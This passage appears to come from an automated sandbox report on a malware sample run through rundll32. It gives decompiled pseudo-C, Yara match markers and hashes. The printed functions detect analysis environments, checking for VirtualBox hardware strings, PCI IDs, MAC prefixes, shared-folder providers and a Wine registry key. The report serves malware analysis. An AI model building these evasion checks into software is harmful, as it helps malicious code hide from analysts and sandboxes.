                                        				asm("movsd [ebp-0x1], xmm1");
                                        				 *((long long*)(_t161 + 0x20)) = _t173;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x20))();
                                        				if (0 < 0) goto 0xf301f953;
                                        				if ( *(_t159 - 0x11) == r12w) goto 0xf301f953;
                                        				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0xf301f949;
                                        				E0000021E21EF310E5B0(_t122,  *((intOrPtr*)(_t159 - 9)), L"Oracle Corporation",  *((intOrPtr*)(_t161 + 0x88)), _t167, _t168);
                                        				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x10))();
                                        				if (_t93 != 0) goto 0xf301f970;
                                        				if ( *((intOrPtr*)(_t159 + 0x77)) != 0) goto 0xf301f860;
                                        				goto 0xf301f974;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x77)))) + 0x10))();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19)))) + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				return _t93;
                                        			}

















                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Similarity
                                        • API ID: String$AllocClearFreeUninitializeVariantwcsstr$Initialize
                                        • String ID: Manufacturer$Oracle Corporation$Product$SELECT * FROM Win32_BaseBoard$VirtualBox$WQL
                                        • API String ID: 1018877641-1142199694
                                        • Opcode ID: 7dd37225c9dd0c544af356bceac6ffd6933853081eb258d3ccf53a44c397afed
                                        • Instruction ID: 79c4f8263c7ffaab95900e60461701efe8b8adc615a80e5abefc771375332eb6
                                        • Opcode Fuzzy Hash: 7dd37225c9dd0c544af356bceac6ffd6933853081eb258d3ccf53a44c397afed
                                        • Instruction Fuzzy Hash: CF81E136605B80CAEB10EF79E8543AE33F4FB94B88F0585169E4957E68DF38C55AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%


                                        C-Code - Quality: 26%
                                        			E0000021E21EF301F520(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, long long __r15, char _a8, void* _a16, void* _a24, void* _a32) {
                                        				long long _v24;
                                        				long long _v32;
                                        				long long _v40;
                                        				long long _v48;
                                        				intOrPtr _v72;
                                        				signed short _v80;
                                        				void* _v88;
                                        				long long _v96;
                                        				long long _v104;
                                        				void* _t53;
                                        				void* _t54;
                                        				signed char _t60;
                                        				intOrPtr _t99;
                                        				intOrPtr* _t112;
                                        				long long _t133;
                                        				long long _t134;
                                        				void* _t145;
                                        
                                        				_t134 = __rsi;
                                        				_a24 = _t133;
                                        				_v88 = _t133;
                                        				_a16 = _t133;
                                        				_t54 = E0000021E21EF30211C0(_t53,  &_a24,  &_v88, __rsi); // executed
                                        				if (_t54 == 0) goto 0xf301f723;
                                        				_v24 = __rbx;
                                        				_v32 = _t134;
                                        				_v40 = __r14;
                                        				_v48 = __r15;
                                        				__imp__#2();
                                        				_t135 = __rax;
                                        				__imp__#2();
                                        				r15d = 1;
                                        				_t102 = __rax;
                                        				r14d = r15d;
                                        				if (__rax == 0) goto 0xf301f5e4;
                                        				if (__rax == 0) goto 0xf301f5db;
                                        				_v96 =  &_a16;
                                        				_t13 = _t133 + 0x30; // 0x31
                                        				r9d = _t13;
                                        				_v104 = _t133;
                                        				_t144 =  *_a24;
                                        				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xf301f5db;
                                        				r14d = 0;
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (__rax == 0) goto 0xf301f5f2;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0xf301f70b;
                                        				_t112 = _a16;
                                        				_a32 = _t133;
                                        				_a8 = 0;
                                        				if (_t112 == 0) goto 0xf301f6eb;
                                        				_v104 =  &_a8;
                                        				r8d = r15d; // executed
                                        				 *((intOrPtr*)( *_t112 + 0x20))();
                                        				if (_a8 == 0) goto 0xf301f6dc;
                                        				_v96 = _t133;
                                        				r8d = 0;
                                        				_v104 = _t133;
                                        				_t99 =  *_a32; // executed
                                        				if ( *((intOrPtr*)(_t99 + 0x20))() < 0) goto 0xf301f6c3;
                                        				_t60 = _v80 & 0x0000ffff;
                                        				if (_t60 == r15w) goto 0xf301f6c3;
                                        				if ((_t60 & 0x00000008) == 0) goto 0xf301f6b9;
                                        				E0000021E21EF310E5B0(__rax, _v72, L"ACPIBus_BUS_0", __rax,  *_a24, _t145);
                                        				if (_t99 != 0) goto 0xf301f6b7;
                                        				E0000021E21EF310E5B0(_t102, _v72, L"PCI_BUS_0", _t135, _t144, _t145);
                                        				if (_t99 != 0) goto 0xf301f6b7;
                                        				E0000021E21EF310E5B0(_t102, _v72, L"PNP_BUS_0", _t135, _t144, _t145);
                                        				if (_t99 == 0) goto 0xf301f6b9;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				if (_a16 != 0) goto 0xf301f620;
                                        				goto 0xf301f6e0;
                                        				if (1 != 3) goto 0xf301f6eb;
                                        				_t74 =  ==  ? r15d : 0;
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				_t68 =  ==  ? r15d : 0;
                                        				return  ==  ? r15d : 0;
                                        			}





















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$wcsstr$AllocFreeUninitialize$ClearInitializeVariant
                                        • String ID: ACPIBus_BUS_0$Name$PCI_BUS_0$PNP_BUS_0$SELECT * FROM Win32_Bus$WQL
                                        • API String ID: 2365594256-2399075642
                                        • Opcode ID: eab667d158c5d7a65a7e10aacd595b8ad7012d16ea1a653bf5cbc84b599de52f
                                        • Instruction ID: 9c97882a8659884d0ea49dc45d3091b37ac8e9aaecabae7546611d7f90901b5b
                                        • Opcode Fuzzy Hash: eab667d158c5d7a65a7e10aacd595b8ad7012d16ea1a653bf5cbc84b599de52f
                                        • Instruction Fuzzy Hash: 15512876300A5086EF109F25E8842DE67F4FBA8B98F1A4616EE4E47F69DF38C456C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 20%
                                        			E0000021E21EF301F120(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                                        				long long _v32;
                                        				long long _v40;
                                        				long long _v48;
                                        				long long _v56;
                                        				intOrPtr _v72;
                                        				short _v80;
                                        				void* _v88;
                                        				long long _v96;
                                        				long long _v104;
                                        				void* __rbx;
                                        				void* _t49;
                                        				void* _t50;
                                        				void* _t63;
                                        				void* _t86;
                                        				intOrPtr* _t95;
                                        				long long _t115;
                                        				void* _t126;
                                        				long long _t131;
                                        
                                        				_t115 = __rsi;
                                        				r15d = 0;
                                        				_a16 = _t131;
                                        				_v88 = _t131;
                                        				_a24 = _t131;
                                        				_t50 = E0000021E21EF30211C0(_t49,  &_a16,  &_v88, __rsi); // executed
                                        				if (_t50 == 0) goto 0xf301f2ec;
                                        				_v32 = _t115;
                                        				_v40 = __rdi;
                                        				_v48 = __r12;
                                        				_v56 = __r14;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				r12d = 1;
                                        				r14d = r12d;
                                        				if (__rax == 0) goto 0xf301f1ea;
                                        				if (__rax == 0) goto 0xf301f1e1;
                                        				_v96 =  &_a24;
                                        				_t13 = _t131 + 0x30; // 0x30
                                        				r9d = _t13;
                                        				_v104 = _t131;
                                        				if ( *((intOrPtr*)( *_a16 + 0xa0))() >= 0) goto 0xf301f1e1;
                                        				r14d = r15d;
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (__rax == 0) goto 0xf301f1fd;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0xf301f2dc;
                                        				_t95 = _a24;
                                        				_a32 = _t131;
                                        				_a8 = r15d;
                                        				if (_t95 == 0) goto 0xf301f2b8;
                                        				asm("o16 nop [eax+eax]");
                                        				_v104 =  &_a8;
                                        				r8d = r12d; // executed
                                        				 *((intOrPtr*)( *_t95 + 0x20))();
                                        				if (_a8 == r15d) goto 0xf301f2b8;
                                        				_v96 = _t131;
                                        				r8d = 0;
                                        				_v104 = _t131;
                                        				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0xf301f29d;
                                        				if (_v80 != 8) goto 0xf301f293;
                                        				E0000021E21EF310E5B0(_t86, _v72, L"PCI\\VEN_80EE&DEV_CAFE", _v32,  *_a16, _t126);
                                        				_t63 =  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				if (_t63 != 0) goto 0xf301f2b8;
                                        				if (_a24 != 0) goto 0xf301f230;
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				return _t63;
                                        			}






















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                                        • String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$SELECT * FROM Win32_PnPEntity$WQL
                                        • API String ID: 1998430482-342862491
                                        • Opcode ID: d51a4c34e003bd172069b5f7fe8728b28793e16d5841d0451cccac60e24534ca
                                        • Instruction ID: 2ec313f1a6820813ce4e3e861a239ade34a2a6716d2d983f7506d51157951f56
                                        • Opcode Fuzzy Hash: d51a4c34e003bd172069b5f7fe8728b28793e16d5841d0451cccac60e24534ca
                                        • Instruction Fuzzy Hash: 0A512476301B5086EB10DF25E89869E67A4F798F98F465216EE4E43F68DF38C48AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 20%
                                        			E0000021E21EF301EA40(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                                        				long long _v32;
                                        				long long _v40;
                                        				long long _v48;
                                        				long long _v56;
                                        				intOrPtr _v72;
                                        				signed short _v80;
                                        				void* _v88;
                                        				long long _v96;
                                        				long long _v104;
                                        				void* __rbx;
                                        				void* _t51;
                                        				void* _t52;
                                        				signed char _t58;
                                        				void* _t66;
                                        				void* _t90;
                                        				intOrPtr* _t99;
                                        				long long _t119;
                                        				void* _t130;
                                        				long long _t135;
                                        
                                        				_t119 = __rsi;
                                        				r15d = 0;
                                        				_a24 = _t135;
                                        				_v88 = _t135;
                                        				_a16 = _t135;
                                        				_t52 = E0000021E21EF30211C0(_t51,  &_a24,  &_v88, __rsi); // executed
                                        				if (_t52 == 0) goto 0xf301ec15;
                                        				_v32 = _t119;
                                        				_v40 = __rdi;
                                        				_v48 = __r12;
                                        				_v56 = __r14;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				r12d = 1;
                                        				r14d = r12d;
                                        				if (__rax == 0) goto 0xf301eb0a;
                                        				if (__rax == 0) goto 0xf301eb01;
                                        				_v96 =  &_a16;
                                        				_t13 = _t135 + 0x30; // 0x30
                                        				r9d = _t13;
                                        				_v104 = _t135;
                                        				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xf301eb01;
                                        				r14d = r15d;
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (__rax == 0) goto 0xf301eb1d;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0xf301ec05;
                                        				_t99 = _a16;
                                        				_a32 = _t135;
                                        				_a8 = r15d;
                                        				if (_t99 == 0) goto 0xf301ebe5;
                                        				asm("o16 nop [eax+eax]");
                                        				_v104 =  &_a8;
                                        				r8d = r12d; // executed
                                        				 *((intOrPtr*)( *_t99 + 0x20))();
                                        				if (_a8 == r15d) goto 0xf301ebe1;
                                        				_v96 = _t135;
                                        				r8d = 0;
                                        				_v104 = _t135;
                                        				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0xf301ebc4;
                                        				_t58 = _v80 & 0x0000ffff;
                                        				if (_t58 == r12w) goto 0xf301ebc4;
                                        				if ((_t58 & 0x00000008) == 0) goto 0xf301ebba;
                                        				E0000021E21EF310E5B0(_t90, _v72, L"08:00:27", _v32,  *_a24, _t130);
                                        				_t66 =  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				if (_t66 != 0) goto 0xf301ebe1;
                                        				if (_a16 != 0) goto 0xf301eb50;
                                        				goto 0xf301ebe5;
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				return _t66;
                                        			}























                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                                        • String ID: 08:00:27$MACAddress$SELECT * FROM Win32_NetworkAdapterConfiguration$WQL
                                        • API String ID: 1998430482-232164535
                                        • Opcode ID: 4b5c6f56fad445e568fe4dacea64a3ffc38b5697cafface0be3d1801f2c824c5
                                        • Instruction ID: 2b357343cc76894d76cbeef952380a7c6f0f9261f51962b3f1420d2e95cc6a8e
                                        • Opcode Fuzzy Hash: 4b5c6f56fad445e568fe4dacea64a3ffc38b5697cafface0be3d1801f2c824c5
                                        • Instruction Fuzzy Hash: B5511536301B5086EF10AF25E8882AE67B4F798F98F165516EE5E43F68DF38C486C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                                        • String ID: %ProgramW6432%
                                        • API String ID: 3127241168-1092591020
                                        • Opcode ID: e31e6983fb8e730e6e55048d195789d7b53ff78273e7e147f474fbb06369237e
                                        • Instruction ID: 21bb5b58469b39f6ea06ed2f92175738282debe5da5185f798e1cc951db625b4
                                        • Opcode Fuzzy Hash: e31e6983fb8e730e6e55048d195789d7b53ff78273e7e147f474fbb06369237e
                                        • Instruction Fuzzy Hash: D9313C3561498081FE219B28EC4A7EB63B1FFE9308F4241159E9943AA5EE3DC15BCB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                                        • String ID: %ProgramW6432%
                                        • API String ID: 3127241168-1092591020
                                        • Opcode ID: f4e446950c117aaa7a5b22abb95a2542fa7d5a0f251ada8163812decc7223617
                                        • Instruction ID: 98925f3dc86b073a360ed293c552454bb62e32664b62a2c39c8fab27c3bca477
                                        • Opcode Fuzzy Hash: f4e446950c117aaa7a5b22abb95a2542fa7d5a0f251ada8163812decc7223617
                                        • Instruction Fuzzy Hash: 29214C7121498081FE709B24EC5A7DB63B1FBE9748F8241129E4D47DA5DE3DC157CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 40%
                                        			E0000021E21EF3111DF0(void* __ecx, void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, char _a24, intOrPtr _a40) {
                                        				long long _v16;
                                        				intOrPtr _v24;
                                        				void* _t12;
                                        				intOrPtr* _t34;
                                        				long long _t35;
                                        				intOrPtr* _t38;
                                        
                                        				_t34 = __rax;
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				if (__r8 != 0) goto 0xf3111e20;
                                        				_t12 = E0000021E21EF3118984(__rax);
                                        				 *__rax = 0x16;
                                        				E0000021E21EF3111BC8(_t12);
                                        				goto 0xf3111ea0;
                                        				E0000021E21EF3111D90(__rax, __rbx, __r8, __r9, __rcx);
                                        				_t38 = _t34;
                                        				if (_t34 == 0) goto 0xf3111e70;
                                        				_t35 =  &_a24;
                                        				_v16 = _t35;
                                        				_v24 = _a40;
                                        				CreateThread(??, ??, ??, ??, ??, ??); // executed
                                        				if (_t35 != 0) goto 0xf3111eb0;
                                        				E0000021E21EF3118914(GetLastError(), _t35, _t38);
                                        				if (_t38 == 0) goto 0xf3111e9d;
                                        				if ( *((intOrPtr*)(_t38 + 0x10)) == 0) goto 0xf3111e86;
                                        				CloseHandle(??);
                                        				if ( *((intOrPtr*)(_t38 + 0x18)) == 0) goto 0xf3111e95;
                                        				FreeLibrary(??);
                                        				return E0000021E21EF3124EE0(_t35, _t38);
                                        			}










                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2067211477-0
                                        • Opcode ID: b51c7cb60d147e5c0669e2db15bcc3ed022d0b02608c378374a75aaf55dc55d9
                                        • Instruction ID: 4bcc86f58dd0bc85c4c86b09f78003257b6d7aa6b2ed67b4232f3722d52629d8
                                        • Opcode Fuzzy Hash: b51c7cb60d147e5c0669e2db15bcc3ed022d0b02608c378374a75aaf55dc55d9
                                        • Instruction Fuzzy Hash: F321533520674041FE25EBA1A8582EBA7F9AFA4BC4F0A4535DE4907F56DF3CC822C640
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$OpenQueryValue
                                        • String ID:
                                        • API String ID: 1607946009-0
                                        • Opcode ID: 80fb25d1c761cdd6296609965d16f533f97d65c48d945b5779956fb6042f6aac
                                        • Instruction ID: b1cc15bb8baf222b080a500d9da4d454ff055771680d9558f012e5cadad436c9
                                        • Opcode Fuzzy Hash: 80fb25d1c761cdd6296609965d16f533f97d65c48d945b5779956fb6042f6aac
                                        • Instruction Fuzzy Hash: B0210072324A8082EF609B11FC5879B63A5FBD9B94F465125AE8D47F58DF3CC455CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocQuery
                                        • String ID:
                                        • API String ID: 31662377-0
                                        • Opcode ID: b56fdc160a3053fb9bded151c2404bcb637792cd7786b653b91c43bb34dcc33a
                                        • Instruction ID: c7d65cc20fdddacf0340fce92c6e6c5168bb1d51d97843a3a2e192c73ca2c989
                                        • Opcode Fuzzy Hash: b56fdc160a3053fb9bded151c2404bcb637792cd7786b653b91c43bb34dcc33a
                                        • Instruction Fuzzy Hash: D031A13170664482FE21AB12E9187A763E0B368FD4F195526ED5E17F89DBBCC543CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E0000021E21EF301B69C(void* __edi, long long __rax, long long __rbx, long long __rdi, long long __r9, long long _a8, long long _a16, char _a32) {
                                        				void* _t16;
                                        				intOrPtr _t24;
                                        				void* _t25;
                                        				long long _t42;
                                        				intOrPtr* _t43;
                                        				signed long long _t44;
                                        				intOrPtr* _t52;
                                        				intOrPtr _t53;
                                        				void* _t61;
                                        				char* _t63;
                                        
                                        				_t60 = __r9;
                                        				_t42 = __rax;
                                        				_a8 = __rbx;
                                        				_a16 = __rdi;
                                        				_a32 = __r9;
                                        				GetModuleHandleA(??);
                                        				if (__rax == 0) goto 0xf301b765;
                                        				_a32 = __rax;
                                        				E0000021E21EF301C2B0(_t25,  &_a32, "RtlExitUserProcess", _t61); // executed
                                        				if (_t42 == 0) goto 0xf301b765;
                                        				 *0xf320b29c = 1;
                                        				if ( *0xf320b29c == 1) goto 0xf301b6ea;
                                        				_t52 =  *0xf320b508;
                                        				if (_t52 == 0) goto 0xf301b74f;
                                        				_t24 =  *0xf320b514;
                                        				if (_t24 == 0) goto 0xf301b723;
                                        				_t43 = _t52;
                                        				if ( *_t43 == 0) goto 0xf301b759;
                                        				_t44 = _t43 + 0x3c;
                                        				if (1 - _t24 < 0) goto 0xf301b715;
                                        				if (1 == 0xffffffff) goto 0xf301b74f;
                                        				_t63 = _t44 * 0x3c + _t52;
                                        				_t53 = _a32;
                                        				 *((long long*)(_t63 + 1)) = _t42;
                                        				_t16 = E0000021E21EF301B4BC(_t44, __rbx, _t63, _t53, _t42, _t60); // executed
                                        				if (_t16 != 0) goto 0xf301b74f;
                                        				 *_t63 = 0;
                                        				 *0xf320b29c = 0;
                                        				goto 0xf301b768;
                                        				 *((char*)(_t44 * 0x3c + _t53)) = 1;
                                        				goto 0xf301b726;
                                        				return 0xffffffff;
                                        			}














                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HandleModulelstrcmp
                                        • String ID: RtlExitUserProcess$ntdll.dll
                                        • API String ID: 4066981444-1735925572
                                        • Opcode ID: 4db69128b072396db0a7319d1b8295cadff92eb00c7c4801250883dabf3213f8
                                        • Instruction ID: 28c0149b1f4406eb008315da15c6e749df732eec6eb2ff39eeaa2eee07860ea9
                                        • Opcode Fuzzy Hash: 4db69128b072396db0a7319d1b8295cadff92eb00c7c4801250883dabf3213f8
                                        • Instruction Fuzzy Hash: D521DA76305B4041FE25EB19AC583AB6792A7A57A0F165227DD5907FE6EB3CC443C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 34%
                                        			E0000021E21EF301E8F0() {
                                        				signed long long _v24;
                                        				char _v552;
                                        				intOrPtr _v568;
                                        				int _t11;
                                        				void* _t13;
                                        				void* _t18;
                                        				void* _t19;
                                        				signed long long _t23;
                                        				void* _t29;
                                        				void* _t32;
                                        				signed long long _t33;
                                        				void* _t34;
                                        
                                        				_t23 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_v24 = _t23 ^ _t33;
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(_t13, 0, _t18, _t19,  &_v552, _t29, _t32, _t34);
                                        				_v568 = 0x104;
                                        				_t11 = WNetGetProviderNameW(??, ??, ??); // executed
                                        				if (_t11 != 0) goto 0xf301e96f;
                                        				__imp__StrCmpIW();
                                        				E0000021E21EF310C290();
                                        				return 0 | _t11 == 0x00000000;
                                        			}
















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: NameProvider
                                        • String ID: VirtualBox Shared Folders
                                        • API String ID: 262172401-2247368375
                                        • Opcode ID: 47de9dabbb41c250f91913fc77dcf4a50a5d8604f73302efefae0fb9d738503c
                                        • Instruction ID: 7010f009ec96fed6ec9c34d1544768af4f0a317dcd122118375d910d42e4554d
                                        • Opcode Fuzzy Hash: 47de9dabbb41c250f91913fc77dcf4a50a5d8604f73302efefae0fb9d738503c
                                        • Instruction Fuzzy Hash: 2E01FF76714A8082FF60EB25EC593DB63A0F7D9745FC15116EE8E86A95EE3CC106CA00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: SOFTWARE\Wine
                                        • API String ID: 47109696-1166244655
                                        • Opcode ID: 508ce3090052390ecea74677034d38ef4e635124e9f833a977fb632fa3428459
                                        • Instruction ID: 2cb512961fa1198096b0a6c25263e3c83fac161354a6cdb8cece7cf6bc2e8df2
                                        • Opcode Fuzzy Hash: 508ce3090052390ecea74677034d38ef4e635124e9f833a977fb632fa3428459
                                        • Instruction Fuzzy Hash: B4F03036610A8082EF609B21F85979B63A0FBD8744F811111AD4D47A95EE3CC016CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 60%
                                        			E0000021E21EF3126904(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r9, long long _a8, long long _a16) {
                                        				void* _t6;
                                        				void* _t11;
                                        				intOrPtr _t13;
                                        				intOrPtr _t16;
                                        				void* _t27;
                                        				void* _t31;
                                        				void* _t33;
                                        				void* _t36;
                                        
                                        				_t33 = __rdx;
                                        				_t31 = __rcx;
                                        				_t29 = __rbx;
                                        				_t27 = __rax;
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				GetLastError();
                                        				_t13 =  *0xf32032b0; // 0x7
                                        				if (_t13 == 0xffffffff) goto 0xf3126935;
                                        				_t6 = E0000021E21EF3126F7C(_t13, __rax, __rbx);
                                        				if (__rax != 0) goto 0xf3126976;
                                        				E0000021E21EF3122114(_t6, _t31, _t33); // executed
                                        				_t36 = _t27;
                                        				if (_t27 != 0) goto 0xf3126955;
                                        				E0000021E21EF3124EE0(_t27, _t31);
                                        				goto 0xf312697b;
                                        				_t16 =  *0xf32032b0; // 0x7
                                        				if (E0000021E21EF3126FD4(_t16, _t27, _t29, _t27, __rsi) == 0) goto 0xf312694e;
                                        				E0000021E21EF31265DC(_t36, _t27);
                                        				_t11 = E0000021E21EF3124EE0(_t27, _t36);
                                        				if (_t36 != 0) goto 0xf3126985;
                                        				SetLastError(??);
                                        				goto 0xf3126990;
                                        				SetLastError(??);
                                        				return _t11;
                                        			}












                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        • Opcode ID: 5f7c3cdbe70bcf1203e98d7aed0c86dfc712dabaf6b4182bb22bdb7db2f05dbd
                                        • Instruction ID: 319f1065785c7b14830e67284cfa59373fea1d064e77933b8552594758eecd74
                                        • Opcode Fuzzy Hash: 5f7c3cdbe70bcf1203e98d7aed0c86dfc712dabaf6b4182bb22bdb7db2f05dbd
